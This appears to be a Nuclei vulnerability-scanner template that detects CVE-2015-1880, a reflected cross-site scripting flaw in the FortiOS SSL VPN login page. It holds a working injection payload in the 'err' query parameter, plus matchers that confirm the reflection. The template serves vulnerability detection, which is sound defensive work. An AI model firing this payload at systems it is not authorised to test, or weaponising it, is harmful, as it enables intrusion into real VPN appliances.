nuclei-templates/cves/2015/CVE-2015-1880.yaml

40 lines
1.1 KiB
YAML

id: CVE-2015-1880
info:
name: Fortinet FortiOS <=5.2.3 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
reference:
- https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page
- http://www.fortiguard.com/advisory/FG-IR-15-005/
- http://web.archive.org/web/20210122155324/https://www.securityfocus.com/bid/74652/
- https://nvd.nist.gov/vuln/detail/CVE-2015-1880
classification:
cve-id: CVE-2015-1880
tags: cve,cve2015,xss,fortigates,ssl
requests:
- method: GET
path:
- "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('{{randstr}}')</script>"
part: body
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/08/12